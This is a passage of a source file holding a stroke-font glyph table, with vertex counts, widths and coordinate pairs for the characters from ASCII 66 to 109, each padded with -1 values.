9,21, 1, 0,-1,-1, 9,21,17, 0,-1,-1, 4, 7,14, 7,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,21, # Ascii 66
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,15,17,13,16,12,13,
11,-1,-1, 4,11,13,11,16,10,17, 9,18, 7,18, 4,17, 2,16, 1,13, 0, 4, 0,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[18,21, # Ascii 67
18,16,17,18,15,20,13,21, 9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5,
3, 7, 1, 9, 0,13, 0,15, 1,17, 3,18, 5,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[15,21, # Ascii 68
4,21, 4, 0,-1,-1, 4,21,11,21,14,20,16,18,17,16,18,13,18, 8,17, 5,16,
3,14, 1,11, 0, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,19, # Ascii 69
4,21, 4, 0,-1,-1, 4,21,17,21,-1,-1, 4,11,12,11,-1,-1, 4, 0,17, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,18, # Ascii 70
4,21, 4, 0,-1,-1, 4,21,17,21,-1,-1, 4,11,12,11,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[22,21, # Ascii 71
18,16,17,18,15,20,13,21, 9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5,
3, 7, 1, 9, 0,13, 0,15, 1,17, 3,18, 5,18, 8,-1,-1,13, 8,18, 8,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,22, # Ascii 72
4,21, 4, 0,-1,-1,18,21,18, 0,-1,-1, 4,11,18,11,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 73
4,21, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,16, # Ascii 74
12,21,12, 5,11, 2,10, 1, 8, 0, 6, 0, 4, 1, 3, 2, 2, 5, 2, 7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,21, # Ascii 75
4,21, 4, 0,-1,-1,18,21, 4, 7,-1,-1, 9,12,18, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,17, # Ascii 76
4,21, 4, 0,-1,-1, 4, 0,16, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,24, # Ascii 77
4,21, 4, 0,-1,-1, 4,21,12, 0,-1,-1,20,21,12, 0,-1,-1,20,21,20, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,22, # Ascii 78
4,21, 4, 0,-1,-1, 4,21,18, 0,-1,-1,18,21,18, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[21,22, # Ascii 79
9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5, 3, 7, 1, 9, 0,13, 0,15,
1,17, 3,18, 5,19, 8,19,13,18,16,17,18,15,20,13,21, 9,21,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[13,21, # Ascii 80
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,14,17,12,16,11,13,
10, 4,10,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[24,22, # Ascii 81
9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5, 3, 7, 1, 9, 0,13, 0,15,
1,17, 3,18, 5,19, 8,19,13,18,16,17,18,15,20,13,21, 9,21,-1,-1,12, 4,
18,-2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[16,21, # Ascii 82
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,15,17,13,16,12,13,
11, 4,11,-1,-1,11,11,18, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[20,20, # Ascii 83
17,18,15,20,12,21, 8,21, 5,20, 3,18, 3,16, 4,14, 5,13, 7,12,13,10,15,
9,16, 8,17, 6,17, 3,15, 1,12, 0, 8, 0, 5, 1, 3, 3,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 84
8,21, 8, 0,-1,-1, 1,21,15,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,22, # Ascii 85
4,21, 4, 6, 5, 3, 7, 1,10, 0,12, 0,15, 1,17, 3,18, 6,18,21,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,18, # Ascii 86
1,21, 9, 0,-1,-1,17,21, 9, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,24, # Ascii 87
2,21, 7, 0,-1,-1,12,21, 7, 0,-1,-1,12,21,17, 0,-1,-1,22,21,17, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,20, # Ascii 88
3,21,17, 0,-1,-1,17,21, 3, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[6,18, # Ascii 89
1,21, 9,11, 9, 0,-1,-1,17,21, 9,11,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,20, # Ascii 90
17,21, 3, 0,-1,-1, 3,21,17,21,-1,-1, 3, 0,17, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,14, # Ascii 91
4,25, 4,-7,-1,-1, 5,25, 5,-7,-1,-1, 4,25,11,25,-1,-1, 4,-7,11,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,14, # Ascii 92
0,21,14,-3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,14, # Ascii 93
9,25, 9,-7,-1,-1,10,25,10,-7,-1,-1, 3,25,10,25,-1,-1, 3,-7,10,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,16, # Ascii 94
6,15, 8,18,10,15,-1,-1, 3,12, 8,17,13,12,-1,-1, 8,17, 8, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,16, # Ascii 95
0,-2,16,-2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[7,10, # Ascii 96
6,21, 5,20, 4,18, 4,16, 5,15, 6,16, 5,17,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 97
15,14,15, 0,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 98
4,21, 4, 0,-1,-1, 4,11, 6,13, 8,14,11,14,13,13,15,11,16, 8,16, 6,15,
3,13, 1,11, 0, 8, 0, 6, 1, 4, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,18, # Ascii 99
15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11,
0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 100
15,21,15, 0,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,18, # Ascii 101
3, 8,15, 8,15,10,14,12,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,12, # Ascii 102
10,21, 8,21, 6,20, 5,17, 5, 0,-1,-1, 2,14, 9,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[22,19, # Ascii 103
15,14,15,-2,14,-5,13,-6,11,-7, 8,-7, 6,-6,-1,-1,15,11,13,13,11,14, 8,
14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 104
4,21, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8, 8, # Ascii 105
3,21, 4,20, 5,21, 4,22, 3,21,-1,-1, 4,14, 4, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,10, # Ascii 106
5,21, 6,20, 7,21, 6,22, 5,21,-1,-1, 6,14, 6,-3, 5,-6, 3,-7, 1,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,17, # Ascii 107
4,21, 4, 0,-1,-1,14,14, 4, 4,-1,-1, 8, 8,15, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 108
4,21, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[18,30, # Ascii 109
4,14, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,15,
10,18,13,20,14,23,14,25,13,26,10,26, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
